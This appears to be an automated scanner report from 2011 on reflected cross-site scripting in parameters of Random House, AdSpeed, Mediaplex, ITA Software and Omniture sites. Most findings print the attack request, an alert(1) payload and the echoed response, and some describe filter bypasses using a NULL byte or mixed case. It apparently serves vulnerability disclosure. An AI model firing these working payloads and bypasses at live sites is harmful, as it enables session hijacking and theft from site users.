<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="htt ...[SNIP]... <a class="rollover" href="http://ecommerce.randomhouse.com/cart.do?from=.d764b"><script>alert(1)</script>ff6160e5949"> ...[SNIP]...
The value of the email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d8a7"><script>alert(1)</script>e76a6b52e057de0cb was submitted in the email parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
The value of the password request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d019"><script>alert(1)</script>c69c47f83fc5ae963 was submitted in the password parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0010afa"style%3d"x%3aexpression(alert(1))"6551a8508b2 was submitted in the from parameter. This input was echoed as 10afa"style="x:expression(alert(1))"6551a8508b2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Request
GET /sign-in.do?from=%0010afa"style%3d"x%3aexpression(alert(1))"6551a8508b2 HTTP/1.1 Host: ecommerce.randomhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: RES_SESSIONID=212207240983843; JSESSIONID=38D14861B5F177BDEE31B25C6E8D7C7F.ecommerce_wrk1; s_cc=true; ResonanceSegment=1; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; s_sq=%5B%5BB%5D%5D; RES_TRACKINGID=686529694590717; CP=null*; rhcartitems=; SC_LINKS=%5B%5BB%5D%5D; __qca=P0-874375948-1303855562358; mbox=session#1303855598284-166145#1303858166|PC#1303855598284-166145#1366928306|check#true#1303856366;
Response
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 22:20:59 GMT Server: Apache Content-Type: text/html;charset=ISO-8859-1 Connection: close Content-Length: 17147
<!-- signIn.vm -->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/ ...[SNIP]... <a class="rollover" href="http://ecommerce.randomhouse.com/cart.do?from=.10afa"style="x:expression(alert(1))"6551a8508b2"> ...[SNIP]...
The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3ec7"><script>alert(1)</script>c88b024cdae was submitted in the from parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the from request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 182e6"%3b566f826a9ff was submitted in the from parameter. This input was echoed as 182e6";566f826a9ff in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /sign-in.do?from=182e6"%3b566f826a9ff HTTP/1.1 Host: ecommerce.randomhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: RES_SESSIONID=212207240983843; JSESSIONID=38D14861B5F177BDEE31B25C6E8D7C7F.ecommerce_wrk1; s_cc=true; ResonanceSegment=1; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; s_sq=%5B%5BB%5D%5D; RES_TRACKINGID=686529694590717; CP=null*; rhcartitems=; SC_LINKS=%5B%5BB%5D%5D; __qca=P0-874375948-1303855562358; mbox=session#1303855598284-166145#1303858166|PC#1303855598284-166145#1366928306|check#true#1303856366;
Response
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 22:21:02 GMT Server: Apache Content-Type: text/html;charset=ISO-8859-1 Connection: close Content-Length: 16907
<!-- signIn.vm -->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/ ...[SNIP]... <!-- var s_account="ranhcorporate,ranhrollup"; var rh_division="Random House Corporate"; var rh_imprint=""; var rh_store="182e6";566f826a9ff"; //--> ...[SNIP]...
The value of the from request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b6f8e</script>0cfb073a38a was submitted in the from parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /sign-in.do?from=b6f8e</script>0cfb073a38a HTTP/1.1 Host: ecommerce.randomhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: RES_SESSIONID=212207240983843; JSESSIONID=38D14861B5F177BDEE31B25C6E8D7C7F.ecommerce_wrk1; s_cc=true; ResonanceSegment=1; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; s_sq=%5B%5BB%5D%5D; RES_TRACKINGID=686529694590717; CP=null*; rhcartitems=; SC_LINKS=%5B%5BB%5D%5D; __qca=P0-874375948-1303855562358; mbox=session#1303855598284-166145#1303858166|PC#1303855598284-166145#1366928306|check#true#1303856366;
Response
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 22:21:44 GMT Server: Apache Content-Type: text/html;charset=ISO-8859-1 Connection: close Content-Length: 16963
<!-- signIn.vm -->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/ ...[SNIP]... <!-- // extract 'from' param var url = window.location.href; var paramStart = url.indexOf("?"); var fromParam = ''; if( 'b6f8e</script>0cfb073a38a' == '') { if( paramStart != -1) { var paramString = url.substr(paramStart + 1); var tokenStart = paramString.indexOf('from'); if( tokenStart != -1) { var token = paramString.substr(toke ...[SNIP]...
The value of the from request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a8336"%3balert(1)//1decb9d5a21 was submitted in the from parameter. This input was echoed as a8336";alert(1)//1decb9d5a21 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/ ...[SNIP]... <!-- var s_account="ranhcorporate,ranhrollup"; var rh_division="Random House Corporate"; var rh_imprint=""; var rh_store="randomhousea8336";alert(1)//1decb9d5a21"; //--> ...[SNIP]...
The value of the ht request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a312"><script>alert(1)</script>2753c92f034 was submitted in the ht parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ad.php?do=html&zid=14678&wd=728&ht=903a312"><script>alert(1)</script>2753c92f034&target=_top&tz=5&ck=Y&jv=Y&scr=1920x1200x16&z=0.07491016224958003&ref=&uri=http%3A//seclists.org/fulldisclosure/2011/Apr/388 HTTP/1.1 Host: g.adspeed.net Proxy-Connection: keep-alive Referer: http://seclists.org/fulldisclosure/2011/Apr/388 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK P3P: policyref="http://g.adspeed.net/w3c/p3p.xml", CP="NOI CUR ADM OUR NOR STA NID" Expires: Sat, 01 Jan 2000 00:00:00 GMT Pragma: no-cache Cache-Control: private, max-age=0, no-cache, no-store, must-revalidate Vary: Accept-Encoding Content-type: text/html Connection: close Date: Tue, 26 Apr 2011 21:51:52 GMT Server: AdSpeed/s10 Content-Length: 397
The value of the wd request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7da22"><ScRiPt>alert(1)</ScRiPt>f8712c21f3c was submitted in the wd parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Request
GET /ad.php?do=html&zid=14678&wd=7287da22"><ScRiPt>alert(1)</ScRiPt>f8712c21f3c&ht=90&target=_top&tz=5&ck=Y&jv=Y&scr=1920x1200x16&z=0.07491016224958003&ref=&uri=http%3A//seclists.org/fulldisclosure/2011/Apr/388 HTTP/1.1 Host: g.adspeed.net Proxy-Connection: keep-alive Referer: http://seclists.org/fulldisclosure/2011/Apr/388 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK P3P: policyref="http://g.adspeed.net/w3c/p3p.xml", CP="NOI CUR ADM OUR NOR STA NID" Expires: Sat, 01 Jan 2000 00:00:00 GMT Pragma: no-cache Cache-Control: private, max-age=0, no-cache, no-store, must-revalidate Vary: Accept-Encoding Content-type: text/html Connection: close Date: Tue, 26 Apr 2011 21:51:50 GMT Server: AdSpeed/s10 Content-Length: 397
The value of the mpck request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b09e"><script>alert(1)</script>f7c22091cea was submitted in the mpck parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /content/0/10105/PF_Mday11_300x250_Coupon_1DznastMdspecDlxdelight.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10105-114325-2060-5%3Fmpt%3D%5B1394099180ER%5D%26mpt2%3D%5B1394099180ER%5D8b09e"><script>alert(1)</script>f7c22091cea&mpt=[1394099180ER]&mpt2=[1394099180ER]&mpvc= HTTP/1.1 Host: img.mediaplex.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=822523287793; mojo2=16228:26209; mojo3=10105:2060/14302:29115/12309:6712/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209
The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4679e"-alert(1)-"a62aee2375a was submitted in the mpck parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /content/0/10105/PF_Mday11_300x250_Coupon_1DznastMdspecDlxdelight.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10105-114325-2060-5%3Fmpt%3D%5B1394099180ER%5D%26mpt2%3D%5B1394099180ER%5D4679e"-alert(1)-"a62aee2375a&mpt=[1394099180ER]&mpt2=[1394099180ER]&mpvc= HTTP/1.1 Host: img.mediaplex.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=822523287793; mojo2=16228:26209; mojo3=10105:2060/14302:29115/12309:6712/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209
The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 403aa"%3balert(1)//7cc5d18bab was submitted in the mpvc parameter. This input was echoed as 403aa";alert(1)//7cc5d18bab in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /content/0/10105/PF_Mday11_300x250_Coupon_1DznastMdspecDlxdelight.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10105-114325-2060-5%3Fmpt%3D%5B1394099180ER%5D%26mpt2%3D%5B1394099180ER%5D&mpt=[1394099180ER]&mpt2=[1394099180ER]&mpvc=403aa"%3balert(1)//7cc5d18bab HTTP/1.1 Host: img.mediaplex.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=822523287793; mojo2=16228:26209; mojo3=10105:2060/14302:29115/12309:6712/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209
The value of the mpvc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ddc4"><script>alert(1)</script>a6ede4c7b5 was submitted in the mpvc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /content/0/10105/PF_Mday11_300x250_Coupon_1DznastMdspecDlxdelight.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10105-114325-2060-5%3Fmpt%3D%5B1394099180ER%5D%26mpt2%3D%5B1394099180ER%5D&mpt=[1394099180ER]&mpt2=[1394099180ER]&mpvc=5ddc4"><script>alert(1)</script>a6ede4c7b5 HTTP/1.1 Host: img.mediaplex.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=822523287793; mojo2=16228:26209; mojo3=10105:2060/14302:29115/12309:6712/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209
The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1c479"-alert(1)-"d9e31151018 was submitted in the mpck parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /content/0/15902/126860/hitachi_anywhere336x280.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F15902-126860-34879-0%3Fmpt%3D49269501c479"-alert(1)-"d9e31151018&mpt=4926950&mpvc=http://ad.uk.doubleclick.net/click%3Bh%3Dv8/3af5/3/0/%2a/u%3B240165093%3B0-0%3B0%3B50681866%3B4252-336/280%3B41773561/41791348/1%3B%3B%7Esscs%3D%3f HTTP/1.1 Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://www.computerworlduk.com/news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/?olo=rss User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=822523287793; mojo2=16228:26209; mojo3=15902:34879/10105:2060/14302:29115/12309:6712/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209
The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bec5d"%3balert(1)//31de559e8c0 was submitted in the mpvc parameter. This input was echoed as bec5d";alert(1)//31de559e8c0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /content/0/15902/126860/hitachi_anywhere336x280.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F15902-126860-34879-0%3Fmpt%3D4926950&mpt=4926950&mpvc=http://ad.uk.doubleclick.net/click%3Bh%3Dv8/3af5/3/0/%2a/u%3B240165093%3B0-0%3B0%3B50681866%3B4252-336/280%3B41773561/41791348/1%3B%3B%7Esscs%3D%3fbec5d"%3balert(1)//31de559e8c0 HTTP/1.1 Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://www.computerworlduk.com/news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/?olo=rss User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=822523287793; mojo2=16228:26209; mojo3=15902:34879/10105:2060/14302:29115/12309:6712/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209
The value of the tab request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5f5a"><script>alert(1)</script>563f308447c was submitted in the tab parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the tab request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a137c"><script>alert(1)</script>2f85ada7e43 was submitted in the tab parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the opt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bec10"><script>alert(1)</script>f83538fe8fc was submitted in the opt parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the t request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80f6c"><script>alert(1)</script>3cb59412b55 was submitted in the t parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 879db<script>alert(1)</script>cb5517fdab7 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /geosearch/service/json/getByCode/salesCity?code=BOS&callback=dojo.io.script.jsonp_dojoIoScript1._jsonpCallback879db<script>alert(1)</script>cb5517fdab7 HTTP/1.1 Host: matrix.itasoftware.com Proxy-Connection: keep-alive Referer: http://matrix.itasoftware.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=269716137.1303847753.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=269716137.2091474344.1303847753.1303847753.1303847753.1; __utmc=269716137; __utmb=269716137.10.10.1303847753
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload abc66<script>alert(1)</script>6d35eb2d05e was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /geosearch/service/json/suggest/citiesAndAirports?name=b&callback=dojo.io.script.jsonp_dojoIoScript2._jsonpCallbackabc66<script>alert(1)</script>6d35eb2d05e HTTP/1.1 Host: matrix.itasoftware.com Proxy-Connection: keep-alive Referer: http://matrix.itasoftware.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=269716137.1303847753.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=241137183.1303847824.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=241137183.2018797994.1303847824.1303847824.1303847824.1; __utmc=241137183; __utmb=241137183.2.10.1303847824; __utma=269716137.2091474344.1303847753.1303847753.1303847753.1; __utmc=269716137; __utmb=269716137.13.10.1303847753
The value of the format request parameter is copied into the HTML document as plain text between tags. The payload 83c7a<script>alert(1)</script>1b026227aec was submitted in the format parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the name request parameter is copied into the HTML document as plain text between tags. The payload 5d5d4<script>alert(1)</script>92fc2adddae was submitted in the name parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
{}&&{"error":{"message":"Unrecognized search name \"specificDates5d5d4<script>alert(1)</script>92fc2adddae\".","resultId":"dRTmERQSGdEwBNSoA0DBeB","type":"input"}}
The value of the summarizers request parameter is copied into the HTML document as plain text between tags. The payload f3f22<script>alert(1)</script>35448f73c03 was submitted in the summarizers parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the format request parameter is copied into the HTML document as plain text between tags. The payload 1b93d<script>alert(1)</script>a1c82177a2e was submitted in the format parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the summarizers request parameter is copied into the HTML document as plain text between tags. The payload 4722f<script>alert(1)</script>1af6d08d9bf was submitted in the summarizers parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 511dc<script>alert(1)</script>f934d3d7cbc was submitted in the mbox parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /m2/omnituremarketing/mbox/standard?mboxHost=www.omniture.com&mboxSession=1303850129880-628856&mboxPC=1303601743323-887111.17&mboxPage=1303850129880-628856&mboxCount=7&mbox=sidebar_global_phone511dc<script>alert(1)</script>f934d3d7cbc&mboxId=0&mboxTime=1303832144712&mboxURL=http%3A%2F%2Fwww.omniture.com%2Fen%2Fproducts%2Fconversion%2Ftestandtarget&mboxReferrer=&mboxVersion=38 HTTP/1.1 Host: omnituremarketing.tt.omtrdc.net Proxy-Connection: keep-alive Referer: http://www.omniture.com/en/products/conversion/testandtarget User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: text/javascript Content-Length: 142 Date: Tue, 26 Apr 2011 20:59:38 GMT Server: Test & Target
The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 1c919<img%20src%3da%20onerror%3dalert(1)>d785e4e61ef was submitted in the mbox parameter. This input was echoed as 1c919<img src=a onerror=alert(1)>d785e4e61ef in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /m2/omnituremarketing/sc/standard?mboxHost=www.omniture.com&mboxSession=1303850129880-628856&mboxPC=1303601743323-887111.17&mboxPage=1303850129880-628856&mboxCount=12&mbox=SiteCatalyst%3A%20event1c919<img%20src%3da%20onerror%3dalert(1)>d785e4e61ef&mboxId=0&mboxTime=1303832151203&charSet=UTF-8&visitorNamespace=omniturecom&cookieLifetime=31536000&pageName=Test%26Target&currencyCode=USD&channel=Products&server=www.omniture.com&events=event69&resolution=1920x1200&colorDepth=16&javascriptVersion=1.6&javaEnabled=Y&cookiesEnabled=Y&browserWidth=1095&browserHeight=937&trackDownloadLinks=true&trackExternalLinks=true&trackInlineStats=true&linkLeaveQueryString=false&linkDownloadFileTypes=exe%2Czip%2Cwav%2Cmp3%2Cmov%2Cmpg%2Cavi%2Cwmv%2Cdoc%2Cpdf%2Cxls%2Czxp%2Cxlsx%2Cdocx%2Cmp4%2Cm4v&linkInternalFilters=javascript%3A%2C207%2C2o7%2Csitecatalyst%2Comniture%2Cwww.registerat.com%2Cthelink.omniture.com&linkTrackVars=None&linkTrackEvents=None&prop1=Non-Customer&eVar1=Non-Customer&eVar3=Now%20Defined%20by%20Test%20and%20Target&eVar4=English&prop5=Now%20Defined%20by%20Test%20and%20Target&prop6=English&eVar7=%2B1&prop14=http%3A%2F%2Fwww.omniture.com%2Fen%2Fproducts%2Fconversion%2Ftestandtarget&eVar17=Data%20Not%20Available&eVar35=http%3A%2F%2Fwww.omniture.com%2Fen%2Fproducts%2Fconversion%2Ftestandtarget&mboxURL=http%3A%2F%2Fwww.omniture.com%2Fen%2Fproducts%2Fconversion%2Ftestandtarget&mboxReferrer=&mboxVersion=38&scPluginVersion=1 HTTP/1.1 Host: omnituremarketing.tt.omtrdc.net Proxy-Connection: keep-alive Referer: http://www.omniture.com/en/products/conversion/testandtarget User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Length: 190 Date: Tue, 26 Apr 2011 21:03:53 GMT Server: Test & Target
if (typeof(mboxFactories) !== 'undefined') {mboxFactories.get('default').get('SiteCatalyst: event1c919<img src=a onerror=alert(1)>d785e4e61ef', 0).setOffer(new mboxOfferDefault()).loaded();}
The value of the mboxId request parameter is copied into the HTML document as plain text between tags. The payload d3c5f<script>alert(1)</script>9584e60e0db was submitted in the mboxId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /m2/omnituremarketing/sc/standard?mboxHost=www.omniture.com&mboxSession=1303850129880-628856&mboxPC=1303601743323-887111.17&mboxPage=1303850129880-628856&mboxCount=12&mbox=SiteCatalyst%3A%20event&mboxId=0d3c5f<script>alert(1)</script>9584e60e0db&mboxTime=1303832151203&charSet=UTF-8&visitorNamespace=omniturecom&cookieLifetime=31536000&pageName=Test%26Target&currencyCode=USD&channel=Products&server=www.omniture.com&events=event69&resolution=1920x1200&colorDepth=16&javascriptVersion=1.6&javaEnabled=Y&cookiesEnabled=Y&browserWidth=1095&browserHeight=937&trackDownloadLinks=true&trackExternalLinks=true&trackInlineStats=true&linkLeaveQueryString=false&linkDownloadFileTypes=exe%2Czip%2Cwav%2Cmp3%2Cmov%2Cmpg%2Cavi%2Cwmv%2Cdoc%2Cpdf%2Cxls%2Czxp%2Cxlsx%2Cdocx%2Cmp4%2Cm4v&linkInternalFilters=javascript%3A%2C207%2C2o7%2Csitecatalyst%2Comniture%2Cwww.registerat.com%2Cthelink.omniture.com&linkTrackVars=None&linkTrackEvents=None&prop1=Non-Customer&eVar1=Non-Customer&eVar3=Now%20Defined%20by%20Test%20and%20Target&eVar4=English&prop5=Now%20Defined%20by%20Test%20and%20Target&prop6=English&eVar7=%2B1&prop14=http%3A%2F%2Fwww.omniture.com%2Fen%2Fproducts%2Fconversion%2Ftestandtarget&eVar17=Data%20Not%20Available&eVar35=http%3A%2F%2Fwww.omniture.com%2Fen%2Fproducts%2Fconversion%2Ftestandtarget&mboxURL=http%3A%2F%2Fwww.omniture.com%2Fen%2Fproducts%2Fconversion%2Ftestandtarget&mboxReferrer=&mboxVersion=38&scPluginVersion=1 HTTP/1.1 Host: omnituremarketing.tt.omtrdc.net Proxy-Connection: keep-alive Referer: 